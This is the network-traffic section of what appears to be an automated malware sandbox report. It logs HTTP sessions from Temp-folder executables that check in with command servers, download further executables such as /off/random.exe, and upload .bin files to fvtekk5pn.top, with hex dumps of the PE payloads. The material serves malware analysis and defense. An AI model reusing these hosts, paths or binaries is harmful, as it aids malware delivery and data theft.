                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5a ae 3d 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 64 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELZ=g"dw@p@@@d|@u4@.text `.rdata@@.datalpH@.rsrc@@@.relocuv@B
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.057351112 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                                                      Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.057391882 CET1236INData Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7
                                                                                                                                                                                                                                                                                      Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY|#l)\DItv
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.057933092 CET672INData Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c
                                                                                                                                                                                                                                                                                      Data Ascii: N^VW3DNF|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.057974100 CET1236INData Raw: 27 ff d6 53 6a 11 88 47 28 ff d6 53 6a 12 88 47 24 ff d6 88 47 25 5f 5e 5b c3 55 8b ec 51 57 33 ff 8d 45 fc 57 50 57 68 00 20 00 00 89 7d fc ff 15 f0 c5 49 00 8b 45 fc 6a 02 57 57 68 01 20 00 00 a3 94 25 4d 00 ff 15 f0 c5 49 00 5f c9 c3 55 8b ec
                                                                                                                                                                                                                                                                                      Data Ascii: 'SjG(SjG$G%_^[UQW3EWPWh }IEjWWh %MI_U=Mt_E%\M%PMXMtIhFM2j3YYuj5%Mjh I\M]3@Usy!xwJxnEP
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.058011055 CET1236INData Raw: 33 c9 83 fe 2b 0f 94 c1 8b 44 88 08 66 83 78 08 47 75 42 8d 41 03 89 45 f8 8d 45 fc 53 50 8d 45 e8 50 8d 45 f8 50 57 e8 1b 44 00 00 85 c0 0f 88 a2 06 04 00 8d 4d e8 e8 6e 77 00 00 8b 55 fc e9 25 ff ff ff b9 6c 15 4d 00 e8 63 08 00 00 33 c0 5f 5e
                                                                                                                                                                                                                                                                                      Data Ascii: 3+DfxGuBAEESPEPEPWDMnwU%lMc3_^[jiXlU<SVMMW}3E7Nuu3RB3t&u"@f9putBuu6UMEPdEM@M_^[I
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.060015917 CET1236INData Raw: 00 8d 8d 78 ff ff ff e8 0f 02 00 00 8d 8d 6c ff ff ff e8 04 02 00 00 8d 8d 60 ff ff ff e8 f9 01 00 00 8d 4d a8 e8 f1 01 00 00 8d 8d 54 ff ff ff e8 e6 01 00 00 8d 4d 9c e8 de 01 00 00 5f 8b c6 5e 5b c9 c3 83 e8 04 0f 84 ca 03 04 00 83 e8 01 0f 84
                                                                                                                                                                                                                                                                                      Data Ascii: xl`MTM_^[rU]AjYf9H}AjYf9HEE}xPG|EIEE}`PGdE%}U]
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.060058117 CET1236INData Raw: 00 04 00 33 ff be 90 23 4d 00 47 3b c7 0f 84 b1 00 04 00 8d 44 24 11 50 51 68 00 14 4d 00 68 18 14 4d 00 8b ce e8 2c 03 00 00 84 c0 0f 84 b1 00 04 00 a0 90 23 4d 00 a2 04 14 4d 00 a0 91 23 4d 00 88 44 24 12 8d 44 24 14 50 8d 84 24 3c 00 01 00 50
                                                                                                                                                                                                                                                                                      Data Ascii: 3#MG;D$PQhMhM,#MM#MD$D$P$<Ph5MhIt$MY@\$5MhMa|$sY4=MMuW0M=MuD$8PIL$(m_^[]
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.060094118 CET296INData Raw: 03 00 57 68 30 ca 49 00 e8 ba 1a 02 00 59 59 85 c0 0f 84 92 fd 03 00 57 68 08 ca 49 00 e8 a5 1a 02 00 59 59 85 c0 0f 84 99 fd 03 00 57 68 dc c9 49 00 e8 90 1a 02 00 59 59 85 c0 75 3e 89 1d 00 14 4d 00 38 5d 0b 75 0a c7 05 00 14 4d 00 03 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii: Wh0IYYWhIYYWhIYYu>M8]uMEPMEMPxEPM9MM3NQjWJ:u3]@ESPEPW@Mt~5EPML?CESjPWf@MK
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.060136080 CET1236INData Raw: 3b 51 1c 7d 1e 8d 42 01 89 01 8b 41 18 8b 4d 08 3b 0c 90 74 08 ff 34 90 e8 21 78 00 00 b0 01 5d c2 04 00 8b 4d 08 68 08 cc 49 00 e8 9e 3a 00 00 32 c0 eb eb 56 57 8b f9 8d 77 14 8b ce e8 15 37 00 00 83 27 00 8b ce c6 47 24 00 c7 06 34 cc 49 00 e8
                                                                                                                                                                                                                                                                                      Data Ascii: ;Q}BAM;t4!x]MhI:2VWw7'G$4I7v-YO_^gU=hMtP3hPhMTPMLHHPPjIUuUuMYY]UQM
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.064511061 CET1236INData Raw: 6a 01 56 68 f4 ca 49 00 68 01 00 00 80 ff 15 18 c0 49 00 85 c0 0f 84 fe fb 03 00 8d 4c 24 18 e8 0e 63 00 00 8d 4c 24 28 e8 05 63 00 00 5f 5e b8 90 23 4d 00 5b 8b e5 5d c2 08 00 55 8b ec 83 ec 14 56 57 8b f9 8d 4d ec e8 b7 73 00 00 8b 4d 08 8d 55
                                                                                                                                                                                                                                                                                      Data Ascii: jVhIhIL$cL$(c_^#M[]UVWMsMU39w +EPOEEPO(w NMb_^USVj[F9Fu0jX;sF3FWQ~Y~_SYMVNF^


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      14192.168.2.650124185.215.113.206808452C:\Users\user\AppData\Local\Temp\1007636001\241fdb96f6.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.222152948 CET90OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:24.929754019 CET203INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:24 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:25.127671957 CET411OUTPOST /c4becf79229cb002.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----IIDHJDGCGDAAKEBGDBKF
                                                                                                                                                                                                                                                                                      Host: 185.215.113.206
                                                                                                                                                                                                                                                                                      Content-Length: 209
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 42 43 34 45 46 33 32 41 37 44 35 34 37 38 32 34 35 32 35 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 44 48 4a 44 47 43 47 44 41 41 4b 45 42 47 44 42 4b 46 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: ------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="hwid"2BC4EF32A7D547824525------IIDHJDGCGDAAKEBGDBKFContent-Disposition: form-data; name="build"mars------IIDHJDGCGDAAKEBGDBKF--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:25.351826906 CET210INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:25 GMT
                                                                                                                                                                                                                                                                                      Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Keep-Alive: timeout=5, max=99
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                                                                                                                                                                                                                      Data Ascii: YmxvY2s=


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      15192.168.2.650127185.215.113.43807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:27.357620955 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      Host: 185.215.113.43
                                                                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 37 36 33 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                                                      Data Ascii: d1=1007637001&unit=246122658369
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.100868940 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:27 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      16192.168.2.650131185.215.113.16807532C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.120651960 CET54OUTGET /off/random.exe HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: 185.215.113.16
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.826386929 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      Date: Wed, 20 Nov 2024 09:55:28 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      Content-Length: 2741248
                                                                                                                                                                                                                                                                                      Last-Modified: Wed, 20 Nov 2024 09:40:13 GMT
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      ETag: "673dae7d-29d400"
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 f4 14 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 9c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: MZ@z!L!This program cannot be run in DOS mode.$PELP(,e"0$@* `@ **`Ui` @ @.rsrc`2@.idata 8@yggyennp)r):@ceftresi *)@.taggant@@*")@
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.826466084 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.826483965 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.826956987 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.826972008 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.826987982 CET620INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.827002048 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.827018976 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                      Data Ascii:
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.827507019 CET1236INData Raw: f5 a9 ad be 00 eb 6f 6d 1c 0b da c4 3b fa a1 a9 d2 5b 7c 95 df c6 b5 c2 52 00 55 9a 4c 10 e9 cf 41 d5 82 90 5f f5 95 ec 18 ef 2c a6 28 02 96 9f df db 66 94 ed 6e 71 8b 26 cb 50 11 e4 e9 e6 88 d6 dc 89 60 1b cb 4d f1 83 f8 bf 10 e4 e9 e6 fa d4 e0
                                                                                                                                                                                                                                                                                      Data Ascii: om;[|RULA_,(fnq&P`Ms k(tm{ g6hrfE}I w:<M*mka!+^&]}|plh2xfqrj"/kUMQjy*"sN3\s
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.827523947 CET1236INData Raw: 07 92 b6 28 b8 1e af bf 99 11 b4 51 1e 42 34 74 c2 8a b9 d6 8e 11 7c 66 f8 a9 b2 b9 e7 db 0c b5 75 f9 a5 2a 77 9f 00 3e 15 0d 82 1d e3 8c ad e1 59 09 2c e4 ac de 53 ac d1 f0 b4 99 6d 10 75 c2 4c 11 ef 6c 7d 1a 9f a2 65 8a 99 dc 2b 19 76 81 ee a8
                                                                                                                                                                                                                                                                                      Data Ascii: (QB4t|fu*w>Y,SmuLl}e+v2[!6:L7=tjWm4F3bU^L".q8f>j11]i@0&od6fyo[wv8&9xFt6FG*X|2A@;'i
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.834268093 CET1236INData Raw: 7e 55 8e 8f 02 45 3e dd 66 02 d1 10 b0 ef ae 19 65 b8 e6 b1 16 5a aa ff 56 e9 c6 9e 3e 81 d3 35 4d 18 b8 1e 4c ee cd ed 7a 65 e9 cc 03 45 b8 0f 58 af c9 d0 24 52 7c 27 67 f2 21 bf 2a 32 82 ac 19 d2 c6 8d 05 81 14 f3 14 ce cc a9 27 3b 85 21 33 12
                                                                                                                                                                                                                                                                                      Data Ascii: ~UE>feZV>5MLzeEX$R|'g!*2';!39H:NL)p?%YVn1/G/fVo&*@h%<GjK1`?+3Pf[:'C)YkHl&>0Wi'$.uZ5v^q.eC}5


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      17192.168.2.65013234.116.198.130806984C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:28.470679045 CET642OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: fvtekk5pn.top
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Content-Length: 463
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------aBOthCcEVYNEQrVxiiiql9
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 61 42 4f 74 68 43 63 45 56 59 4e 45 51 72 56 78 69 69 69 71 6c 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 48 75 63 65 76 65 79 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ee db 06 50 6b 92 7f 34 75 06 d6 8f 96 e0 83 6c 91 d2 2a 6d 7c 14 fe f8 78 fd 72 42 f9 13 30 18 a2 51 f2 dc 23 12 0e 4a 35 9a 4e 0f de 41 ad 54 b2 b6 2b ab 7d 2a d8 6c 0f 01 a4 cd 29 0d 47 b5 0c b6 09 d4 bc 4f ae ec be a6 2a e5 4e fc b0 b9 84 d5 7f 95 22 5e 3a fb 80 3a 49 4f d5 a3 6e 21 f7 fd 4e e9 2e a1 27 04 d9 c1 c3 c3 31 48 26 d4 3b b0 a4 5e 58 73 f9 c3 9f 92 bf 5b 97 dd 42 52 1e 71 9f de 56 7d 94 53 d2 1f 72 9e 44 7c 9f 1d ab cf 7e da 01 67 5e e1 48 1d 5d 63 e7 37 9c 2a f7 1a 9a 45 41 52 e4 dd 08 0a f4 86 5d 13 70 16 c8 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: --------------------------aBOthCcEVYNEQrVxiiiql9Content-Disposition: form-data; name="file"; filename="Hucevey.bin"Content-Type: application/octet-streamPk4ul*m|xrB0Q#J5NAT+}*l)GO*N"^::IOn!N.'1H&;^Xs[BRqV}SrD|~g^H]c7*EAR]pfk`Xx8n#NAyl1VJwc'G~S7+5l--------------------------aBOthCcEVYNEQrVxiiiql9--
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:29.176780939 CET190INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      server: nginx/1.24.0 (Ubuntu)
                                                                                                                                                                                                                                                                                      date: Wed, 20 Nov 2024 09:55:29 GMT
                                                                                                                                                                                                                                                                                      content-type: text/plain; charset=utf-8
                                                                                                                                                                                                                                                                                      content-length: 2
                                                                                                                                                                                                                                                                                      etag: W/"2-nOO9QiTIwXgNtWtBJezz8kv3SLc"
                                                                                                                                                                                                                                                                                      Data Raw: 4f 4b
                                                                                                                                                                                                                                                                                      Data Ascii: OK


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      18192.168.2.65013434.116.198.130806984C:\Users\user\AppData\Local\Temp\1007634001\824db60d2b.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.175982952 CET12360OUTPOST /v1/upload.php HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: fvtekk5pn.top
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Content-Length: 78227
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------fcEwoLMqRrb1hatPvTvvxu
                                                                                                                                                                                                                                                                                      Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 66 63 45 77 6f 4c 4d 71 52 72 62 31 68 61 74 50 76 54 76 76 78 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4e 6f 72 75 66 6f 70 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 2b fd f5 4e 7d 33 ef c0 50 0a a4 e8 76 69 19 43 1f 90 6e 9e 2c 56 35 b4 92 f2 ee 9d 3f bf 94 46 b8 93 a0 60 f9 07 3c ce ee 0e 65 c6 91 4f 34 f2 7c fb c9 8b 48 be b0 74 0d d1 86 57 dd 1c 7e a8 85 4e a1 fb f3 2e d1 4d fc 29 14 b1 d6 0d fb 06 d4 aa 41 67 61 9a d6 c4 d9 40 5c 0d dd 21 4f e4 fd d7 13 8a 9d 8c 95 ba 4e 33 1f 17 f1 d3 80 e9 c8 70 98 0e 07 92 89 fe a2 ec d8 88 1e 26 c9 1a a9 4a 01 da 4f 98 36 84 39 6c 03 0e 55 18 54 71 37 b1 2b 53 81 54 de 19 8f cb fe f8 8b 6c 64 7d 6c da 9c b6 b1 8a 09 8e 78 02 7e 28 69 d1 81 ac d7 [TRUNCATED]
                                                                                                                                                                                                                                                                                      Data Ascii: --------------------------fcEwoLMqRrb1hatPvTvvxuContent-Disposition: form-data; name="file"; filename="Norufop.bin"Content-Type: application/octet-stream+N}3PviCn,V5?F`<eO4|HtW~N.M)Aga@\!ON3p&JO69lUTq7+STld}lx~(imJpU#W"ADn>_/$Q=%0rc5`G">?g${p~WKQv]J%o+QQlR!LL7)8 8LnYZi[xxaCE|]^E/5tww:> t>6Y$'=v;=OT>JJ]-<\+p~>_x> @Hv]k;$fwPo$:&* nAp:Ib=]6s/=o0A\A|[PmG8BmxTCx~M}n+WU=)Piw.q%bY/|F=WZ}O=O*yUNB\}@e#EoJUd~,n9vf\,E([OKl&0B//:&D?v/7&`NZO/_~q?RS<&bO?J$Dl< [TRUNCATED]
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:55:31.183517933 CET2472OUTData Raw: af d3 9e 22 b9 94 9a e4 12 95 ab 88 3d 83 3b 4c 8d e9 71 55 d1 9d 3d 6b 1c e9 cc db 7b 7b 19 e5 7a 59 2d 0d 0c 96 96 c3 9c 6d 9f 60 19 28 ec 6d 82 28 38 c2 76 57 26 7d a7 51 ec a5 81 d6 8c 29 a3 10 70 4b 46 c7 50 7c 57 ec dc d2 34 4e 45 06 5d 6d
                                                                                                                                                                                                                                                                                      Data Ascii: "=;LqU=k{{zY-m`(m(8vW&}Q)pKFP|W4NE]m3s`P*.6W|4p#OAc"422C)5oJVis/f&>UjmHGDj<{jki^_l%:YD1M!0-7=
